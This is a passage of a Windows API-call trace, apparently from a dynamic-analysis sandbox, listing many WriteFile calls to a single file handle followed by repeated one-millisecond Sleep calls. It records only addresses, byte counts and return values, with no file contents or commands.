	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x26d07a0*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d07a0*, lpNumberOfBytesWritten=0x129420*=0x4f, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x26d07f1*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d07f1*, lpNumberOfBytesWritten=0x129420*=0x50, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x26d0843*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0843*, lpNumberOfBytesWritten=0x129420*=0x1d, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x26d0862*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0862*, lpNumberOfBytesWritten=0x129420*=0x34, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x26d0898*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0898*, lpNumberOfBytesWritten=0x129420*=0x4d, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.966] WriteFile (in: hFile=0x534, lpBuffer=0x26d08e7*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d08e7*, lpNumberOfBytesWritten=0x129420*=0x45, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x26d092e*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d092e*, lpNumberOfBytesWritten=0x129420*=0x4f, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x26d097f*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d097f*, lpNumberOfBytesWritten=0x129420*=0x43, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x26d09c4*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d09c4*, lpNumberOfBytesWritten=0x129420*=0x33, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x26d09f9*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d09f9*, lpNumberOfBytesWritten=0x129420*=0x48, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x26d0a43*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0a43*, lpNumberOfBytesWritten=0x129420*=0x10, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x26d0a55*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0a55*, lpNumberOfBytesWritten=0x129420*=0x42, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x26d0a99*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0a99*, lpNumberOfBytesWritten=0x129420*=0x42, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.967] WriteFile (in: hFile=0x534, lpBuffer=0x26d0add*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0add*, lpNumberOfBytesWritten=0x129420*=0x2b, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x26d0b0a*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0b0a*, lpNumberOfBytesWritten=0x129420*=0x4f, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x26d0b5b*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0b5b*, lpNumberOfBytesWritten=0x129420*=0x23, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x26d0b80*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0b80*, lpNumberOfBytesWritten=0x129420*=0x49, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x26d0bcb*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0bcb*, lpNumberOfBytesWritten=0x129420*=0x10, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x26d0bdd*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0bdd*, lpNumberOfBytesWritten=0x129420*=0x1e, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x26d0bfd*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0bfd*, lpNumberOfBytesWritten=0x129420*=0x49, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.968] WriteFile (in: hFile=0x534, lpBuffer=0x26d0c48*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0c48*, lpNumberOfBytesWritten=0x129420*=0x2d, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x26d0c77*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0c77*, lpNumberOfBytesWritten=0x129420*=0x36, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x26d0caf*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0caf*, lpNumberOfBytesWritten=0x129420*=0x48, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x26d0cf9*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0cf9*, lpNumberOfBytesWritten=0x129420*=0x37, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x26d0d32*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0d32*, lpNumberOfBytesWritten=0x129420*=0x2b, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x26d0d5f*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0d5f*, lpNumberOfBytesWritten=0x129420*=0x3f, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x26d0da0*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0da0*, lpNumberOfBytesWritten=0x129420*=0x45, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x26d0de7*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0de7*, lpNumberOfBytesWritten=0x129420*=0x22, lpOverlapped=0x0) returned 1
	[0201.969] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x26d0e0b*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0e0b*, lpNumberOfBytesWritten=0x129420*=0x51, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x26d0e5e*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0e5e*, lpNumberOfBytesWritten=0x129420*=0x46, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x26d0ea6*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0ea6*, lpNumberOfBytesWritten=0x129420*=0x3f, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x26d0ee7*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0ee7*, lpNumberOfBytesWritten=0x129420*=0x3e, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x26d0f27*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0f27*, lpNumberOfBytesWritten=0x129420*=0x51, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x26d0f7a*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0f7a*, lpNumberOfBytesWritten=0x129420*=0x43, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x26d0fbf*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0fbf*, lpNumberOfBytesWritten=0x129420*=0x2e, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x26d0fef*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d0fef*, lpNumberOfBytesWritten=0x129420*=0x19, lpOverlapped=0x0) returned 1
	[0201.970] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.971] WriteFile (in: hFile=0x534, lpBuffer=0x26d100a*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d100a*, lpNumberOfBytesWritten=0x129420*=0x48, lpOverlapped=0x0) returned 1
	[0201.971] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.971] WriteFile (in: hFile=0x534, lpBuffer=0x26d1054*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1054*, lpNumberOfBytesWritten=0x129420*=0x55, lpOverlapped=0x0) returned 1
	[0201.971] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.971] WriteFile (in: hFile=0x534, lpBuffer=0x26d10ab*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d10ab*, lpNumberOfBytesWritten=0x129420*=0x4e, lpOverlapped=0x0) returned 1
	[0201.971] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.971] WriteFile (in: hFile=0x534, lpBuffer=0x26d10fb*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d10fb*, lpNumberOfBytesWritten=0x129420*=0x20, lpOverlapped=0x0) returned 1
	[0201.971] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.971] WriteFile (in: hFile=0x534, lpBuffer=0x26d111d*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d111d*, lpNumberOfBytesWritten=0x129420*=0x15, lpOverlapped=0x0) returned 1
	[0201.971] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.974] Sleep (dwMilliseconds=0x1) 
	[0202.023] Sleep (dwMilliseconds=0x1) 
	[0202.042] Sleep (dwMilliseconds=0x1) 
	[0202.082] Sleep (dwMilliseconds=0x1) 
	[0202.086] Sleep (dwMilliseconds=0x1) 
	[0202.102] Sleep (dwMilliseconds=0x1) 
	[0202.119] Sleep (dwMilliseconds=0x1) 
	[0202.138] Sleep (dwMilliseconds=0x1) 
	[0202.195] Sleep (dwMilliseconds=0x1) 
	[0202.242] Sleep (dwMilliseconds=0x1) 
	[0202.272] Sleep (dwMilliseconds=0x1) 
	[0202.288] Sleep (dwMilliseconds=0x1) 
	[0202.306] Sleep (dwMilliseconds=0x1) 
	[0202.324] Sleep (dwMilliseconds=0x1) 
	[0202.337] Sleep (dwMilliseconds=0x1) 
	[0202.354] Sleep (dwMilliseconds=0x1) 
	[0202.413] Sleep (dwMilliseconds=0x1) 
	[0202.469] Sleep (dwMilliseconds=0x1) 
	[0202.491] Sleep (dwMilliseconds=0x1) 
	[0202.507] Sleep (dwMilliseconds=0x1) 
	[0202.524] Sleep (dwMilliseconds=0x1) 
	[0202.541] Sleep (dwMilliseconds=0x1) 
	[0202.557] Sleep (dwMilliseconds=0x1) 
	[0202.572] Sleep (dwMilliseconds=0x1) 
	[0202.631] Sleep (dwMilliseconds=0x1) 
	[0202.678] Sleep (dwMilliseconds=0x1) 
	[0202.704] Sleep (dwMilliseconds=0x1) 
	[0202.710] Sleep (dwMilliseconds=0x1) 
	[0202.727] Sleep (dwMilliseconds=0x1) 
	[0202.746] Sleep (dwMilliseconds=0x1) 
	[0202.759] Sleep (dwMilliseconds=0x1) 
	[0202.774] Sleep (dwMilliseconds=0x1) 
	[0202.791] Sleep (dwMilliseconds=0x1) 
	[0202.850] Sleep (dwMilliseconds=0x1) 
	[0202.897] Sleep (dwMilliseconds=0x1) 
	[0202.923] Sleep (dwMilliseconds=0x1) 
	[0202.928] Sleep (dwMilliseconds=0x1) 
	[0202.945] Sleep (dwMilliseconds=0x1) 
	[0202.962] Sleep (dwMilliseconds=0x1) 
	[0202.978] Sleep (dwMilliseconds=0x1) 
	[0202.996] Sleep (dwMilliseconds=0x1) 
	[0203.008] Sleep (dwMilliseconds=0x1) 
	[0203.069] Sleep (dwMilliseconds=0x1) 
	[0203.123] Sleep (dwMilliseconds=0x1) 
	[0203.144] Sleep (dwMilliseconds=0x1) 
	[0203.147] Sleep (dwMilliseconds=0x1) 
	[0203.164] Sleep (dwMilliseconds=0x1) 
	[0203.180] Sleep (dwMilliseconds=0x1) 
	[0203.196] Sleep (dwMilliseconds=0x1) 
	[0203.212] Sleep (dwMilliseconds=0x1) 
	[0203.224] Sleep (dwMilliseconds=0x1) 
	[0203.287] Sleep (dwMilliseconds=0x1) 
	[0203.335] Sleep (dwMilliseconds=0x1) 
	[0203.351] Sleep (dwMilliseconds=0x1) 
	[0203.366] Sleep (dwMilliseconds=0x1) 
	[0203.382] Sleep (dwMilliseconds=0x1) 
	[0203.398] Sleep (dwMilliseconds=0x1) 
	[0203.413] Sleep (dwMilliseconds=0x1) 
	[0203.431] Sleep (dwMilliseconds=0x1) 
	[0203.445] Sleep (dwMilliseconds=0x1) 
	[0203.505] Sleep (dwMilliseconds=0x1) 
	[0203.552] Sleep (dwMilliseconds=0x1) 
	[0203.573] Sleep (dwMilliseconds=0x1) 
	[0203.584] Sleep (dwMilliseconds=0x1) 
	[0203.600] Sleep (dwMilliseconds=0x1) 
	[0203.636] Sleep (dwMilliseconds=0x1) 
	[0203.645] Sleep (dwMilliseconds=0x1) 
	[0203.661] Sleep (dwMilliseconds=0x1) 
	[0203.724] Sleep (dwMilliseconds=0x1) 
	[0203.770] Sleep (dwMilliseconds=0x1) 
	[0203.791] Sleep (dwMilliseconds=0x1) 
	[0203.802] Sleep (dwMilliseconds=0x1) 
	[0203.818] Sleep (dwMilliseconds=0x1) 
	[0203.835] Sleep (dwMilliseconds=0x1) 
	[0203.852] Sleep (dwMilliseconds=0x1) 
	[0203.871] Sleep (dwMilliseconds=0x1) 
	[0203.883] Sleep (dwMilliseconds=0x1) 
	[0203.942] Sleep (dwMilliseconds=0x1) 
	[0203.991] Sleep (dwMilliseconds=0x1) 
	[0204.007] Sleep (dwMilliseconds=0x1) 
	[0204.039] Sleep (dwMilliseconds=0x1) 
	[0204.051] Sleep (dwMilliseconds=0x1) 
	[0204.074] Sleep (dwMilliseconds=0x1) 
	[0204.082] Sleep (dwMilliseconds=0x1) 
	[0204.099] Sleep (dwMilliseconds=0x1) 
	[0204.161] Sleep (dwMilliseconds=0x1) 
	[0204.207] Sleep (dwMilliseconds=0x1) 
	[0204.231] Sleep (dwMilliseconds=0x1) 
	[0204.242] Sleep (dwMilliseconds=0x1) 
	[0204.254] Sleep (dwMilliseconds=0x1) 
	[0204.271] Sleep (dwMilliseconds=0x1) 
	[0204.287] Sleep (dwMilliseconds=0x1) 
	[0204.302] Sleep (dwMilliseconds=0x1) 
	[0204.318] Sleep (dwMilliseconds=0x1) 
	[0204.377] Sleep (dwMilliseconds=0x1) 
	[0204.427] Sleep (dwMilliseconds=0x1) 
	[0204.452] Sleep (dwMilliseconds=0x1) 
	[0204.458] Sleep (dwMilliseconds=0x1) 
	[0204.472] Sleep (dwMilliseconds=0x1) 
	[0204.490] Sleep (dwMilliseconds=0x1) 
	[0204.507] Sleep (dwMilliseconds=0x1) 
	[0204.524] Sleep (dwMilliseconds=0x1) 
	[0204.537] Sleep (dwMilliseconds=0x1) 
	[0204.597] Sleep (dwMilliseconds=0x1) 
	[0204.645] Sleep (dwMilliseconds=0x1) 
	[0204.691] Sleep (dwMilliseconds=0x1) 
	[0204.707] Sleep (dwMilliseconds=0x1) 
	[0204.727] Sleep (dwMilliseconds=0x1) 
	[0204.740] Sleep (dwMilliseconds=0x1) 
	[0204.755] Sleep (dwMilliseconds=0x1) 
	[0204.773] Sleep (dwMilliseconds=0x1) 
	[0204.788] Sleep (dwMilliseconds=0x1) 
	[0204.847] Sleep (dwMilliseconds=0x1) 
